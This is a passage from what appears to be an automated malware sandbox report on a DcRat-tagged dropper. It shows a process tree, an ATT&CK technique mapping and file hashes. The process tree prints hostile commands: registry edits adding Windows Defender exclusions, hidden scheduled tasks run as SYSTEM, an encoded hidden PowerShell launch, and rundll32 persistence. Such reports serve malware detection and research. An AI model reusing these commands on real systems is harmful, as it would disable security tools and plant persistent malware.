                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:4224
                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\RHdUtmclRPrQNqWD /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:1408
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\RHdUtmclRPrQNqWD /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:1676
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /CREATE /TN "gGXNEoFNl" /SC once /ST 01:04:12 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                      • DcRat
                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                      PID:2752
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /run /I /tn "gGXNEoFNl"
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:4744
                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                        schtasks /DELETE /F /TN "gGXNEoFNl"
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:2180
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /CREATE /TN "CHeJVxoJwhzmREGSo" /SC once /ST 11:03:18 /RU "SYSTEM" /TR "\"C:\Windows\Temp\RHdUtmclRPrQNqWD\McgkcspSIzRLCAP\zCCFulD.exe\" sG /site_id 525403 /S" /V1 /F
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • DcRat
                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                          PID:3816
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /run /I /tn "CHeJVxoJwhzmREGSo"
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:3892
                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:1316
                                                                                                                                                                                                            • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                              "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:988
                                                                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:4792
                                                                                                                                                                                                              • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:3796
                                                                                                                                                                                                                • C:\Windows\Temp\RHdUtmclRPrQNqWD\McgkcspSIzRLCAP\zCCFulD.exe
                                                                                                                                                                                                                  C:\Windows\Temp\RHdUtmclRPrQNqWD\McgkcspSIzRLCAP\zCCFulD.exe sG /site_id 525403 /S
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  • Drops Chrome extension
                                                                                                                                                                                                                  • Drops desktop.ini file(s)
                                                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                                                  PID:1096
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                    schtasks /DELETE /F /TN "booXbIzkEgfNdKvxAC"
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:1136
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                      cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:1564
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                          REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:2520
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                          cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:820
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                              REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:1968
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                              schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\QMuGxDzxU\NmrODC.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "cPyDayBYNpjUpuO" /V1 /F
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                              • DcRat
                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                              PID:4636
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                              schtasks /CREATE /TN "cPyDayBYNpjUpuO2" /F /xml "C:\Program Files (x86)\QMuGxDzxU\hRCdDrF.xml" /RU "SYSTEM"
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                              • DcRat
                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                              PID:1676
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                              schtasks /END /TN "cPyDayBYNpjUpuO"
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:2796
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                schtasks /DELETE /F /TN "cPyDayBYNpjUpuO"
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:3808
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                  schtasks /CREATE /TN "CKLLrKbBjRttlf" /F /xml "C:\Program Files (x86)\YhmfbgEUeceU2\ZlGJpMH.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                  • DcRat
                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                  PID:4732

                                                                                                                                                                                                                              Network

                                                                                                                                                                                                                              MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                              Execution

                                                                                                                                                                                                                              Scheduled Task

                                                                                                                                                                                                                              1
                                                                                                                                                                                                                              T1053

                                                                                                                                                                                                                              Persistence

                                                                                                                                                                                                                              Modify Existing Service

                                                                                                                                                                                                                              1
                                                                                                                                                                                                                              T1031

                                                                                                                                                                                                                              Registry Run Keys / Startup Folder

                                                                                                                                                                                                                              1
                                                                                                                                                                                                                              T1060

                                                                                                                                                                                                                              Scheduled Task

                                                                                                                                                                                                                              1
                                                                                                                                                                                                                              T1053

                                                                                                                                                                                                                              Privilege Escalation

                                                                                                                                                                                                                              Scheduled Task

                                                                                                                                                                                                                              1
                                                                                                                                                                                                                              T1053

                                                                                                                                                                                                                              Defense Evasion

                                                                                                                                                                                                                              Modify Registry

                                                                                                                                                                                                                              4
                                                                                                                                                                                                                              T1112

                                                                                                                                                                                                                              Disabling Security Tools

                                                                                                                                                                                                                              1
                                                                                                                                                                                                                              T1089

                                                                                                                                                                                                                              Install Root Certificate

                                                                                                                                                                                                                              1
                                                                                                                                                                                                                              T1130

                                                                                                                                                                                                                              Credential Access

                                                                                                                                                                                                                              Credentials in Files

                                                                                                                                                                                                                              3
                                                                                                                                                                                                                              T1081

                                                                                                                                                                                                                              Discovery

                                                                                                                                                                                                                              Query Registry

                                                                                                                                                                                                                              6
                                                                                                                                                                                                                              T1012

                                                                                                                                                                                                                              System Information Discovery

                                                                                                                                                                                                                              6
                                                                                                                                                                                                                              T1082

                                                                                                                                                                                                                              Peripheral Device Discovery

                                                                                                                                                                                                                              1
                                                                                                                                                                                                                              T1120

                                                                                                                                                                                                                              Process Discovery

                                                                                                                                                                                                                              1
                                                                                                                                                                                                                              T1057

                                                                                                                                                                                                                              Collection

                                                                                                                                                                                                                              Data from Local System

                                                                                                                                                                                                                              3
                                                                                                                                                                                                                              T1005

                                                                                                                                                                                                                              Command and Control

                                                                                                                                                                                                                              Web Service

                                                                                                                                                                                                                              1
                                                                                                                                                                                                                              T1102

                                                                                                                                                                                                                              Replay Monitor

                                                                                                                                                                                                                              Loading Replay Monitor...

                                                                                                                                                                                                                              Downloads

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\sonia_7.exe.log
                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                84cfdb4b995b1dbf543b26b86c863adc

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                d2f47764908bf30036cf8248b9ff5541e2711fa2

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                d8988d672d6915b46946b28c06ad8066c50041f6152a91d37ffa5cf129cc146b

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                485f0ed45e13f00a93762cbf15b4b8f996553baa021152fae5aba051e3736bcd3ca8f4328f0e6d9e3e1f910c96c4a9ae055331123ee08e3c2ce3a99ac2e177ce

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS0FC683AD\libcurl.dll
                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS0FC683AD\libcurl.dll
                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS0FC683AD\libcurlpp.dll
                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS0FC683AD\libcurlpp.dll
                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS0FC683AD\libgcc_s_dw2-1.dll
                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS0FC683AD\libgcc_s_dw2-1.dll
                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS0FC683AD\libstdc++-6.dll
                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS0FC683AD\libstdc++-6.dll
                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS0FC683AD\libwinpthread-1.dll
                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS0FC683AD\libwinpthread-1.dll
                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS0FC683AD\setup_install.exe
                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                dea8c89234f3962f9db2278711c4a3bb

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                4520a6391e64f8904b527af6eac1d5c41f548f74

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                b2a6d70f8243e904484de7df0246c3ab60f864a63e075b9ca9762858e76f09e8

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                31786c4fa70e61a90576639029753513f69c5e39519c63f721dd491e67daa694f35477a6b2a3efe41146719af7ed5e510989142c397862c139f21ccb5d3d3614

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS0FC683AD\setup_install.exe
                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                dea8c89234f3962f9db2278711c4a3bb

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                4520a6391e64f8904b527af6eac1d5c41f548f74

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                b2a6d70f8243e904484de7df0246c3ab60f864a63e075b9ca9762858e76f09e8

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                31786c4fa70e61a90576639029753513f69c5e39519c63f721dd491e67daa694f35477a6b2a3efe41146719af7ed5e510989142c397862c139f21ccb5d3d3614

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS0FC683AD\sonia_1.exe
                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                7837314688b7989de1e8d94f598eb2dd

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                889ae8ce433d5357f8ea2aff64daaba563dc94e3

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                d8c28d07c365873b4e8332f057f062e65f2dd0cd4d599fd8b16d82eca5cf4247

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                3df0c24a9f51a82716abb8e87ff44fdb6686183423d1f2f7d6bfb4cd03c3a18490f2c7987c29f3e1b2d25c48d428c2e73033998a872b185f70bb68a7aedb3e7c

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS0FC683AD\sonia_1.txt
                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                7837314688b7989de1e8d94f598eb2dd

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                889ae8ce433d5357f8ea2aff64daaba563dc94e3

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                d8c28d07c365873b4e8332f057f062e65f2dd0cd4d599fd8b16d82eca5cf4247

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                3df0c24a9f51a82716abb8e87ff44fdb6686183423d1f2f7d6bfb4cd03c3a18490f2c7987c29f3e1b2d25c48d428c2e73033998a872b185f70bb68a7aedb3e7c

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS0FC683AD\sonia_2.exe
                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                36fa664628d9e0901895152b683647a0

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                089c3318eb41a933b7794ea8d7ecf9e6582e9713

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                44fc68e7d32a403f3993f76dca5699a915d6d956d0467472de74e0ae497ceed8

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                811a6f5ba465510168dd560a4af7a69bd48ee355fc74fd334905659ae4b5c325419b30995a6b80cb87ee116873269e3598aa8fb470735113ead06c6db053076f

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS0FC683AD\sonia_2.txt
                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                36fa664628d9e0901895152b683647a0

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                089c3318eb41a933b7794ea8d7ecf9e6582e9713

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                44fc68e7d32a403f3993f76dca5699a915d6d956d0467472de74e0ae497ceed8

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                811a6f5ba465510168dd560a4af7a69bd48ee355fc74fd334905659ae4b5c325419b30995a6b80cb87ee116873269e3598aa8fb470735113ead06c6db053076f

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS0FC683AD\sonia_3.exe
                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                ffc281193727cd351a098a0b34001793

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                496f06f0c2ab5cc41746ee7b1d357a2af7268885

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                a5c543a2ba2609a4fbf7fc69010e12ac0c6355ad5c8891ebdb20852728427766

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                aed2a5076d15ba3fad0b19ea7cb167021d8f1860a76668014bd9d3b8bafb3adbd9d1eed828929d0d6018e015814004141397f36ddbc34ba6a58751cb7e266c30

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS0FC683AD\sonia_3.txt
                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                ffc281193727cd351a098a0b34001793

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                496f06f0c2ab5cc41746ee7b1d357a2af7268885

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                a5c543a2ba2609a4fbf7fc69010e12ac0c6355ad5c8891ebdb20852728427766

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                aed2a5076d15ba3fad0b19ea7cb167021d8f1860a76668014bd9d3b8bafb3adbd9d1eed828929d0d6018e015814004141397f36ddbc34ba6a58751cb7e266c30

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS0FC683AD\sonia_4.exe
                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                5668cb771643274ba2c375ec6403c266

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                dd78b03428b99368906fe62fc46aaaf1db07a8b9

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                d417bd4de6a5227f5ea5cff3567e74fe2b2a25c0a80123b7b37b27db89adc384

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                135bd12414773cc84270af5225920a01487626528d7bbc2b703be71652265772c2e5488ee3f7e2c53b0b01c617b8c7920e0b457472b6724cfa9ec4c390b0a55a

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS0FC683AD\sonia_4.txt
                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                5668cb771643274ba2c375ec6403c266

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                dd78b03428b99368906fe62fc46aaaf1db07a8b9

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                d417bd4de6a5227f5ea5cff3567e74fe2b2a25c0a80123b7b37b27db89adc384

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                135bd12414773cc84270af5225920a01487626528d7bbc2b703be71652265772c2e5488ee3f7e2c53b0b01c617b8c7920e0b457472b6724cfa9ec4c390b0a55a

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS0FC683AD\sonia_5.exe
                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                0d7730cfff0b9750c111a0171d8f0a8f

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                f3ccb125e9ea1031309de8aabfdad983f3e1c91c

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                bb3b64a719b38e6bff37c9596d8e2211992b250aa07b13983d3673f98cb8e6c7

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                c6d6af68dd37af4e5b35032cefdb0fbcc17f8a88b915c73733a09428b8f069cf9646093bccb69d693fb36b1b6b84c583e9e0cac15228f355c507a3392079bdc4

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS0FC683AD\sonia_5.txt
                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                0d7730cfff0b9750c111a0171d8f0a8f

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                f3ccb125e9ea1031309de8aabfdad983f3e1c91c

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                bb3b64a719b38e6bff37c9596d8e2211992b250aa07b13983d3673f98cb8e6c7

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                c6d6af68dd37af4e5b35032cefdb0fbcc17f8a88b915c73733a09428b8f069cf9646093bccb69d693fb36b1b6b84c583e9e0cac15228f355c507a3392079bdc4

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS0FC683AD\sonia_6.exe
                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                51e7f03ae54c977764c32b0dedf0b9ac

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                03cf8e81b1b8a96097c9e3da11f925e7dc6819b7

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                0580678f81e9801e3678c5d4cf1cfe674aa52ce95092e67908d6a7d4192a429b

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                03ea4d2dd652c3fd858c54cf579c410a12c7296acf222ebad57bcfaea33b71fc411122bc35a7b8ff56cb0254e42a6042fbe6efdb47a97ba61fb6ed15c9931661

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS0FC683AD\sonia_6.txt
                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                51e7f03ae54c977764c32b0dedf0b9ac

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                03cf8e81b1b8a96097c9e3da11f925e7dc6819b7

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                0580678f81e9801e3678c5d4cf1cfe674aa52ce95092e67908d6a7d4192a429b

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                03ea4d2dd652c3fd858c54cf579c410a12c7296acf222ebad57bcfaea33b71fc411122bc35a7b8ff56cb0254e42a6042fbe6efdb47a97ba61fb6ed15c9931661

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS0FC683AD\sonia_7.exe
                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                b35429243cde1ce73e5536800eb7d45e

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                3053cf91c3db2174e18977e7aa36f9df6321a16e

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                9f251d5f05a267eb6ce4a99eb17ed954610604c0a6741c29dc2f53dfb1f08297

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                ba8df63416baa5ee89c1b751c27630a6cd4cacf568243dcaf90df18c013a01741ed6502a5a98a32177971a892e538f3cfd0e75148f1d8739f55364acb30bb99b

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS0FC683AD\sonia_7.exe
                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                b35429243cde1ce73e5536800eb7d45e

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                3053cf91c3db2174e18977e7aa36f9df6321a16e

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                9f251d5f05a267eb6ce4a99eb17ed954610604c0a6741c29dc2f53dfb1f08297

                                                                                                                                                                                                                                SHA512

